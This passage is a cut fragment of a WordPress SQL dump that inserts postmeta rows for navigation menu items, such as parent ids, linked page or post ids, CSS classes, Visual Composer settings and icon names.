,'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57136,4464,'_menu_item_icon','null'),(57137,4465,'_menu_item_type','post_type'),(57138,4465,'_menu_item_menu_item_parent','4383'),(57139,4465,'_menu_item_object_id','1393'),(57140,4465,'_menu_item_object','page'),(57141,4465,'_menu_item_target',''),(57142,4465,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57143,4465,'_menu_item_xfn',''),(57144,4465,'_menu_item_url',''),(57145,4465,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57146,4465,'_menu_item_icon','null'),(57147,4466,'_menu_item_type','post_type'),(57148,4466,'_menu_item_menu_item_parent','4382'),(57149,4466,'_menu_item_object_id','1650'),(57150,4466,'_menu_item_object','page'),(57151,4466,'_menu_item_target',''),(57152,4466,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57153,4466,'_menu_item_xfn',''),(57154,4466,'_menu_item_url',''),(57155,4466,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57156,4466,'_menu_item_icon','null'),(57157,4467,'_menu_item_type','post_type'),(57158,4467,'_menu_item_menu_item_parent','4383'),(57159,4467,'_menu_item_object_id','1642'),(57160,4467,'_menu_item_object','page'),(57161,4467,'_menu_item_target',''),(57162,4467,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57163,4467,'_menu_item_xfn',''),(57164,4467,'_menu_item_url',''),(57165,4467,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57166,4467,'_menu_item_icon','null'),(57167,4468,'_menu_item_type','post_type'),(57168,4468,'_menu_item_menu_item_parent','4378'),(57169,4468,'_menu_item_object_id','1650'),(57170,4468,'_menu_item_object','page'),(57171,4468,'_menu_item_target',''),(57172,4468,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57173,4468,'_menu_item_xfn',''),(57174,4468,'_menu_item_url',''),(57175,4468,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57176,4468,'_menu_item_icon','null'),(57177,4469,'_menu_item_type','post_type'),(57178,4469,'_menu_item_menu_item_parent','4379'),(57179,4469,'_menu_item_object_id','1642'),(57180,4469,'_menu_item_object','page'),(57181,4469,'_menu_item_target',''),(57182,4469,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57183,4469,'_menu_item_xfn',''),(57184,4469,'_menu_item_url',''),(57185,4469,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57186,4469,'_menu_item_icon','null'),(57187,4470,'_menu_item_type','post_type'),(57188,4470,'_menu_item_menu_item_parent','4379'),(57189,4470,'_menu_item_object_id','1393'),(57190,4470,'_menu_item_object','page'),(57191,4470,'_menu_item_target',''),(57192,4470,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57193,4470,'_menu_item_xfn',''),(57194,4470,'_menu_item_url',''),(57195,4470,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57196,4470,'_menu_item_icon','null'),(57197,4471,'_menu_item_type','post_type'),(57198,4471,'_menu_item_menu_item_parent','4378'),(57199,4471,'_menu_item_object_id','1658'),(57200,4471,'_menu_item_object','page'),(57201,4471,'_menu_item_target',''),(57202,4471,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57203,4471,'_menu_item_xfn',''),(57204,4471,'_menu_item_url',''),(57205,4471,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57206,4471,'_menu_item_icon','icon-star'),(57207,4471,'_menu_item_icon_pack','simple_line_icons'),(57208,4472,'_menu_item_type','post_type'),(57209,4472,'_menu_item_menu_item_parent','4382'),(57210,4472,'_menu_item_object_id','1658'),(57211,4472,'_menu_item_object','page'),(57212,4472,'_menu_item_target',''),(57213,4472,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57214,4472,'_menu_item_xfn',''),(57215,4472,'_menu_item_url',''),(57216,4472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57217,4472,'_menu_item_icon','icon-star'),(57218,4472,'_menu_item_icon_pack','simple_line_icons'),(57219,4473,'_menu_item_type','post_type'),(57220,4473,'_menu_item_menu_item_parent','4381'),(57221,4473,'_menu_item_object_id','1662'),(57222,4473,'_menu_item_object','page'),(57223,4473,'_menu_item_target',''),(57224,4473,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57225,4473,'_menu_item_xfn',''),(57226,4473,'_menu_item_url',''),(57227,4473,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57228,4473,'_menu_item_icon','null'),(57229,4474,'_menu_item_type','post_type'),(57230,4474,'_menu_item_menu_item_parent','4377'),(57231,4474,'_menu_item_object_id','1662'),(57232,4474,'_menu_item_object','page'),(57233,4474,'_menu_item_target',''),(57234,4474,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57235,4474,'_menu_item_xfn',''),(57236,4474,'_menu_item_url',''),(57237,4474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57238,4474,'_menu_item_icon','null'),(57239,4475,'_menu_item_type','post_type'),(57240,4475,'_menu_item_menu_item_parent','4378'),(57241,4475,'_menu_item_object_id','1722'),(57242,4475,'_menu_item_object','page'),(57243,4475,'_menu_item_target',''),(57244,4475,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57245,4475,'_menu_item_xfn',''),(57246,4475,'_menu_item_url',''),(57247,4475,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57248,4475,'_menu_item_icon','icon-star'),(57249,4475,'_menu_item_icon_pack','simple_line_icons'),(57250,4476,'_menu_item_type','post_type'),(57251,4476,'_menu_item_menu_item_parent','4382'),(57252,4476,'_menu_item_object_id','1722'),(57253,4476,'_menu_item_object','page'),(57254,4476,'_menu_item_target',''),(57255,4476,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57256,4476,'_menu_item_xfn',''),(57257,4476,'_menu_item_url',''),(57258,4476,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57259,4476,'_menu_item_icon','icon-star'),(57260,4476,'_menu_item_icon_pack','simple_line_icons'),(57261,4477,'_menu_item_type','post_type'),(57262,4477,'_menu_item_menu_item_parent','4381'),(57263,4477,'_menu_item_object_id','3073'),(57264,4477,'_menu_item_object','page'),(57265,4477,'_menu_item_target',''),(57266,4477,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57267,4477,'_menu_item_xfn',''),(57268,4477,'_menu_item_url',''),(57269,4477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57270,4477,'_menu_item_icon','null'),(57271,4478,'_menu_item_type','post_type'),(57272,4478,'_menu_item_menu_item_parent','4383'),(57273,4478,'_menu_item_object_id','1734'),(57274,4478,'_menu_item_object','page'),(57275,4478,'_menu_item_target',''),(57276,4478,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57277,4478,'_menu_item_xfn',''),(57278,4478,'_menu_item_url',''),(57279,4478,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57280,4478,'_menu_item_icon','null'),(57281,4479,'_menu_item_type','post_type'),(57282,4479,'_menu_item_menu_item_parent','4377'),(57283,4479,'_menu_item_object_id','3073'),(57284,4479,'_menu_item_object','page'),(57285,4479,'_menu_item_target',''),(57286,4479,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57287,4479,'_menu_item_xfn',''),(57288,4479,'_menu_item_url',''),(57289,4479,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57290,4479,'_menu_item_icon','null'),(57291,4480,'_menu_item_type','post_type'),(57292,4480,'_menu_item_menu_item_parent','4379'),(57293,4480,'_menu_item_object_id','1734'),(57294,4480,'_menu_item_object','page'),(57295,4480,'_menu_item_target',''),(57296,4480,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57297,4480,'_menu_item_xfn',''),(57298,4480,'_menu_item_url',''),(57299,4480,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57300,4480,'_menu_item_icon','null'),(57301,4481,'_menu_item_type','post_type'),(57302,4481,'_menu_item_menu_item_parent','4350'),(57303,4481,'_menu_item_object_id','1679'),(57304,4481,'_menu_item_object','page'),(57305,4481,'_menu_item_target',''),(57306,4481,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57307,4481,'_menu_item_xfn',''),(57308,4481,'_menu_item_url',''),(57309,4481,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57310,4481,'_menu_item_icon','null'),(57311,4482,'_menu_item_type','post_type'),(57312,4482,'_menu_item_menu_item_parent','4387'),(57313,4482,'_menu_item_object_id','3770'),(57314,4482,'_menu_item_object','post'),(57315,4482,'_menu_item_target',''),(57316,4482,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57317,4482,'_menu_item_xfn',''),(57318,4482,'_menu_item_url',''),(57319,4482,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57320,4482,'_menu_item_icon','null'),(57321,4483,'_menu_item_type','post_type'),(57322,4483,'_menu_item_menu_item_parent','4387'),(57323,4483,'_menu_item_object_id','1685'),(57324,4483,'_menu_item_object','post'),(57325,4483,'_menu_item_target',''),(57326,4483,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57327,4483,'_menu_item_xfn',''),(57328,4483,'_menu_item_url',''),(57329,4483,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57330,4483,'_menu_item_icon','null'),(57331,4484,'_menu_item_type','post_type'),(57332,4484,'_menu_item_menu_item_parent','4387'),(57333,4484,'_menu_item_object_id','1677'),(57334,4484,'_menu_item_object','post'),(57335,4484,'_menu_item_target',''),(57336,4484,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57337,4484,'_menu_item_xfn',''),(57338,4484,'_menu_item_url',''),(57339,4484,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57340,4484,'_menu_item_icon','null'),(57341,4485,'_menu_item_type','post_type'),(57342,4485,'_menu_item_menu_item_parent','4387'),(57343,4485,'_menu_item_object_id','1671'),(57344,4485,'_menu_item_object','post'),(57345,4485,'_menu_item_target',''),(57346,4485,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57347,4485,'_menu_item_xfn',''),(57348,4485,'_menu_item_url',''),(57349,4485,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57350,4485,'_menu_item_icon','null'),(57351,4486,'_menu_item_type','post_type'),(57352,4486,'_menu_item_menu_item_parent','4387'),(57353,4486,'_menu_item_object_id','1670'),(57354,4486,'_menu_item_object','post'),(57355,4486,'_menu_item_target',''),(57356,4486,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57357,4486,'_menu_item_xfn',''),(57358,4486,'_menu_item_url',''),(57359,4486,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57360,4486,'_menu_item_icon','null'),(57361,4487,'_menu_item_type','post_type'),(57362,4487,'_menu_item_menu_item_parent','4387'),(57363,4487,'_menu_item_object_id','1681'),(57364,4487,'_menu_item_object','post'),(57365,4487,'_menu_item_target',''),(57366,4487,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57367,4487,'_menu_item_xfn',''),(57368,4487,'_menu_item_url',''),(57369,4487,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57370,4487,'_menu_item_icon','null'),(57371,4488,'_menu_item_type','post_type'),(57372,4488,'_menu_item_menu_item_parent','4378'),(57373,4488,'_menu_item_object_id','1742'),(57374,4488,'_menu_item_object','page'),(57375,4488,'_menu_item_target',''),(57376,4488,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57377,4488,'_menu_item_xfn',''),(57378,4488,'_menu_item_url',''),(57379,4488,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57380,4488,'_menu_item_icon','null'),(57381,4489,'_menu_item_type','post_type'),(57382,4489,'_menu_item_menu_item_parent','4382'),(57383,4489,'_menu_item_object_id','1742'),(57384,4489,'_menu_item_object','page'),(57385,4489,'_menu_item_target',''),(57386,4489,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57387,4489,'_menu_item_xfn',''),(57388,4489,'_menu_item_url',''),(57389,4489,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57390,4489,'_menu_item_icon','null'),(57391,4490,'_menu_item_type','post_type'),(57392,4490,'_menu_item_menu_item_parent','4377'),(57393,4490,'_menu_item_object_id','1804'),(57394,4490,'_menu_item_object','page'),(57395,4490,'_menu_item_target',''),(57396,4490,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57397,4490,'_menu_item_xfn',''),(57398,4490,'_menu_item_url',''),(57399,4490,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57400,4490,'_menu_item_icon','null'),(57401,4491,'_menu_item_type','post_type'),(57402,4491,'_menu_item_menu_item_parent','4381'),(57403,4491,'_menu_item_object_id','1804'),(57404,4491,'_menu_item_object','page'),(57405,4491,'_menu_item_target',''),(57406,4491,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57407,4491,'_menu_item_xfn',''),(57408,4491,'_menu_item_url',''),(57409,4491,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57410,4491,'_menu_item_icon','null'),(57411,4492,'_menu_item_type','post_type'),(57412,4492,'_menu_item_menu_item_parent','4360'),(57413,4492,'_menu_item_object_id','3053'),(57414,4492,'_menu_item_object','page'),(57415,4492,'_menu_item_target',''),(57416,4492,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57417,4492,'_menu_item_xfn',''),(57418,4492,'_menu_item_url',''),(57419,4492,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57420,4493,'_menu_item_type','post_type'),(57421,4493,'_menu_item_menu_item_parent','4360'),(57422,4493,'_menu_item_object_id','3055'),(57423,4493,'_menu_item_object','page'),(57424,4493,'_menu_item_target',''),(57425,4493,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57426,4493,'_menu_item_xfn',''),(57427,4493,'_menu_item_url',''),(57428,4493,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57429,4494,'_menu_item_type','post_type'),(57430,4494,'_menu_item_menu_item_parent','4379'),(57431,4494,'_menu_item_object_id','1836'),(57432,4494,'_menu_item_object','page'),(57433,4494,'_menu_item_target',''),(57434,4494,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57435,4494,'_menu_item_xfn',''),(57436,4494,'_menu_item_url',''),(57437,4494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57438,4494,'_menu_item_icon','null'),(57439,4495,'_menu_item_type','post_type'),(57440,4495,'_menu_item_menu_item_parent','4380'),(57441,4495,'_menu_item_object_id','1827'),(57442,4495,'_menu_item_object','page'),(57443,4495,'_menu_item_target',''),(57444,4495,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57445,4495,'_menu_item_xfn',''),(57446,4495,'_menu_item_url',''),(57447,4495,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57448,4495,'_menu_item_icon','null'),(57449,4496,'_menu_item_type','post_type'),(57450,4496,'_menu_item_menu_item_parent','4383'),(57451,4496,'_menu_item_object_id','1836'),(57452,4496,'_menu_item_object','page'),(57453,4496,'_menu_item_target',''),(57454,4496,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57455,4496,'_menu_item_xfn',''),(57456,4496,'_menu_item_url',''),(57457,4496,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57458,4496,'_menu_item_icon','null'),(57459,4497,'_menu_item_type','post_type'),(57460,4497,'_menu_item_menu_item_parent','4384'),(57461,4497,'_menu_item_object_id','1827'),(57462,4497,'_menu_item_object','page'),(57463,4497,'_menu_item_target',''),(57464,4497,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57465,4497,'_menu_item_xfn',''),(57466,4497,'_menu_item_url',''),(57467,4497,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57468,4497,'_menu_item_icon','null'),(57469,4498,'_menu_item_type','post_type'),(57470,4498,'_menu_item_menu_item_parent','4361'),(57471,4498,'_menu_item_object_id','3054'),(57472,4498,'_menu_item_object','page'),(57473,4498,'_menu_item_target',''),(57474,4498,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57475,4498,'_menu_item_xfn',''),(57476,4498,'_menu_item_url',''),(57477,4498,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57478,4499,'_menu_item_type','post_type'),(57479,4499,'_menu_item_menu_item_parent','4361'),(57480,4499,'_menu_item_object_id','3052'),(57481,4499,'_menu_item_object','page'),(57482,4499,'_menu_item_target',''),(57483,4499,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57484,4499,'_menu_item_xfn',''),(57485,4499,'_menu_item_url',''),(57486,4499,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57487,4500,'_menu_item_type','post_type'),(57488,4500,'_menu_item_menu_item_parent','4361'),(57489,4500,'_menu_item_object_id','3051'),(57490,4500,'_menu_item_object','page'),(57491,4500,'_menu_item_target',''),(57492,4500,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57493,4500,'_menu_item_xfn',''),(57494,4500,'_menu_item_url',''),(57495,4500,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57496,4501,'_menu_item_type','post_type'),(57497,4501,'_menu_item_menu_item_parent','4361'),(57498,4501,'_menu_item_object_id','3049'),(57499,4501,'_menu_item_object','page'),(57500,4501,'_menu_item_target',''),(57501,4501,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57502,4501,'_menu_item_xfn',''),(57503,4501,'_menu_item_url',''),(57504,4501,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57505,4502,'_menu_item_type','post_type'),(57506,4502,'_menu_item_menu_item_parent','4363'),(57507,4502,'_menu_item_object_id','3065'),(57508,4502,'_menu_item_object','page'),(57509,4502,'_menu_item_target',''),(57510,4502,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57511,4502,'_menu_item_xfn',''),(57512,4502,'_menu_item_url',''),(57513,4502,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57514,4503,'_menu_item_type','post_type'),(57515,4503,'_menu_item_menu_item_parent','4363'),(57516,4503,'_menu_item_object_id','3066'),(57517,4503,'_menu_item_object','page'),(57518,4503,'_menu_item_target',''),(57519,4503,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57520,4503,'_menu_item_xfn',''),(57521,4503,'_menu_item_url',''),(57522,4503,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57523,4504,'_menu_item_type','post_type'),(57524,4504,'_menu_item_menu_item_parent','4363'),(57525,4504,'_menu_item_object_id','3067'),(57526,4504,'_menu_item_object','page'),(57527,4504,'_menu_item_target',''),(57528,4504,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57529,4504,'_menu_item_xfn',''),(57530,4504,'_menu_item_url',''),(57531,4504,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57532,4505,'_menu_item_type','post_type'),(57533,4505,'_menu_item_menu_item_parent','4364'),(57534,4505,'_menu_item_object_id','1679'),(57535,4505,'_menu_item_object','page'),(57536,4505,'_menu_item_target',''),(57537,4505,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57538,4505,'_menu_item_xfn',''),(57539,4505,'_menu_item_url',''),(57540,4505,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57541,4506,'_menu_item_type','post_type'),(57542,4506,'_menu_item_menu_item_parent','4364'),(57543,4506,'_menu_item_object_id','3770'),(57544,4506,'_menu_item_object','post'),(57545,4506,'_menu_item_target',''),(57546,4506,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57547,4506,'_menu_item_xfn',''),(57548,4506,'_menu_item_url',''),(57549,4506,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57550,4507,'_menu_item_type','post_type'),(57551,4507,'_menu_item_menu_item_parent','4364'),(57552,4507,'_menu_item_object_id','1685'),(57553,4507,'_menu_item_object','post'),(57554,4507,'_menu_item_target',''),(57555,4507,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57556,4507,'_menu_item_xfn',''),(57557,4507,'_menu_item_url',''),(57558,4507,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57559,4508,'_menu_item_type','post_type'),(57560,4508,'_menu_item_menu_item_parent','4368'),(57561,4508,'_menu_item_object_id','3770'),(57562,4508,'_menu_item_object','post'),(57563,4508,'_menu_item_target',''),(57564,4508,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57565,4508,'_menu_item_xfn',''),(57566,4508,'_menu_item_url',''),(57567,4508,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57568,4509,'_menu_item_type','post_type'),(57569,4509,'_menu_item_menu_item_parent','4368'),(57570,4509,'_menu_item_object_id','1685'),(57571,4509,'_menu_item_object','post'),(57572,4509,'_menu_item_target',''),(57573,4509,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57574,4509,'_menu_item_xfn',''),(57575,4509,'_menu_item_url',''),(57576,4509,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57577,4510,'_menu_item_type','post_type'),(57578,4510,'_menu_item_menu_item_parent','4368'),(57579,4510,'_menu_item_object_id','1679'),(57580,4510,'_menu_item_object','page'),(57581,4510,'_menu_item_target',''),(57582,4510,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57583,4510,'_menu_item_xfn',''),(57584,4510,'_menu_item_url',''),(57585,4510,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57586,4511,'_menu_item_type','post_type'),(57587,4511,'_menu_item_menu_item_parent','4366'),(57588,4511,'_menu_item_object_id','3054'),(57589,4511,'_menu_item_object','page'),(57590,4511,'_menu_item_target',''),(57591,4511,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57592,4511,'_menu_item_xfn',''),(57593,4511,'_menu_item_url',''),(57594,4511,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57595,4512,'_menu_item_type','post_type'),(57596,4512,'_menu_item_menu_item_parent','4366'),(57597,4512,'_menu_item_object_id','3052'),(57598,4512,'_menu_item_object','page'),(57599,4512,'_menu_item_target',''),(57600,4512,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57601,4512,'_menu_item_xfn',''),(57602,4512,'_menu_item_url',''),(57603,4512,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57604,4513,'_menu_item_type','post_type'),(57605,4513,'_menu_item_menu_item_parent','4366'),(57606,4513,'_menu_item_object_id','3049'),(57607,4513,'_menu_item_object','page'),(57608,4513,'_menu_item_target',''),(57609,4513,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57610,4513,'_menu_item_xfn',''),(57611,4513,'_menu_item_url',''),(57612,4513,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57613,4514,'_menu_item_type','post_type'),(57614,4514,'_menu_item_menu_item_parent','4366'),(57615,4514,'_menu_item_object_id','3043'),(57616,4514,'_menu_item_object','page'),(57617,4514,'_menu_item_target',''),(57618,4514,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57619,4514,'_menu_item_xfn',''),(57620,4514,'_menu_item_url',''),(57621,4514,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57622,4515,'_menu_item_type','post_type'),(57623,4515,'_menu_item_menu_item_parent','4383'),(57624,4515,'_menu_item_object_id','1857'),(57625,4515,'_menu_item_object','page'),(57626,4515,'_menu_item_target',''),(57627,4515,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57628,4515,'_menu_item_xfn',''),(57629,4515,'_menu_item_url',''),(57630,4515,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57631,4515,'_menu_item_icon','null'),(57632,4516,'_menu_item_type','post_type'),(57633,4516,'_menu_item_menu_item_parent','4383'),(57634,4516,'_menu_item_object_id','1852'),(57635,4516,'_menu_item_object','page'),(57636,4516,'_menu_item_target',''),(57637,4516,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57638,4516,'_menu_item_xfn',''),(57639,4516,'_menu_item_url',''),(57640,4516,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57641,4516,'_menu_item_icon','null'),(57642,4517,'_menu_item_type','post_type'),(57643,4517,'_menu_item_menu_item_parent','4379'),(57644,4517,'_menu_item_object_id','1857'),(57645,4517,'_menu_item_object','page'),(57646,4517,'_menu_item_target',''),(57647,4517,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57648,4517,'_menu_item_xfn',''),(57649,4517,'_menu_item_url',''),(57650,4517,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57651,4517,'_menu_item_icon','null'),(57652,4518,'_menu_item_type','post_type'),(57653,4518,'_menu_item_menu_item_parent','4379'),(57654,4518,'_menu_item_object_id','1852'),(57655,4518,'_menu_item_object','page'),(57656,4518,'_menu_item_target',''),(57657,4518,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57658,4518,'_menu_item_xfn',''),(57659,4518,'_menu_item_url',''),(57660,4518,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57661,4518,'_menu_item_icon','null'),(57662,4519,'_menu_item_type','post_type'),(57663,4519,'_menu_item_menu_item_parent','4384'),(57664,4519,'_menu_item_object_id','3074'),(57665,4519,'_menu_item_object','page'),(57666,4519,'_menu_item_target',''),(57667,4519,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57668,4519,'_menu_item_xfn',''),(57669,4519,'_menu_item_url',''),(57670,4519,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57671,4519,'_menu_item_icon','null'),(57672,4520,'_menu_item_type','post_type'),(57673,4520,'_menu_item_menu_item_parent','4380'),(57674,4520,'_menu_item_object_id','3074'),(57675,4520,'_menu_item_object','page'),(57676,4520,'_menu_item_target',''),(57677,4520,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57678,4520,'_menu_item_xfn',''),(57679,4520,'_menu_item_url',''),(57680,4520,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57681,4520,'_menu_item_icon','null'),(57682,4521,'_menu_item_type','post_type'),(57683,4521,'_menu_item_menu_item_parent','4378'),(57684,4521,'_menu_item_object_id','1995'),(57685,4521,'_menu_item_object','page'),(57686,4521,'_menu_item_target',''),(57687,4521,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57688,4521,'_menu_item_xfn',''),(57689,4521,'_menu_item_url',''),(57690,4521,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57691,4521,'_menu_item_icon','null'),(57692,4522,'_menu_item_type','post_type'),(57693,4522,'_menu_item_menu_item_parent','4382'),(57694,4522,'_menu_item_object_id','1995'),(57695,4522,'_menu_item_object','page'),(57696,4522,'_menu_item_target',''),(57697,4522,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57698,4522,'_menu_item_xfn',''),(57699,4522,'_menu_item_url',''),(57700,4522,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57701,4522,'_menu_item_icon','null'),(57702,4523,'_menu_item_type','post_type'),(57703,4523,'_menu_item_menu_item_parent','4349'),(57704,4523,'_menu_item_object_id','3054'),(57705,4523,'_menu_item_object','page'),(57706,4523,'_menu_item_target',''),(57707,4523,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57708,4523,'_menu_item_xfn',''),(57709,4523,'_menu_item_url',''),(57710,4523,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57711,4523,'_menu_item_icon','null'),(57712,4524,'_menu_item_type','post_type'),(57713,4524,'_menu_item_menu_item_parent','4349'),(57714,4524,'_menu_item_object_id','3052'),(57715,4524,'_menu_item_object','page'),(57716,4524,'_menu_item_target',''),(57717,4524,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57718,4524,'_menu_item_xfn',''),(57719,4524,'_menu_item_url',''),(57720,4524,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57721,4524,'_menu_item_icon','null'),(57722,4525,'_menu_item_type','post_type'),(57723,4525,'_menu_item_menu_item_parent','4349'),(57724,4525,'_menu_item_object_id','3051'),(57725,4525,'_menu_item_object','page'),(57726,4525,'_menu_item_target',''),(57727,4525,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57728,4525,'_menu_item_xfn',''),(57729,4525,'_menu_item_url',''),(57730,4525,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57731,4525,'_menu_item_icon','null'),(57732,4526,'_menu_item_type','post_type'),(57733,4526,'_menu_item_menu_item_parent','4349'),(57734,4526,'_menu_item_object_id','3049'),(57735,4526,'_menu_item_object','page'),(57736,4526,'_menu_item_target',''),(57737,4526,'_menu_item_classes','a:1:{i:0;s: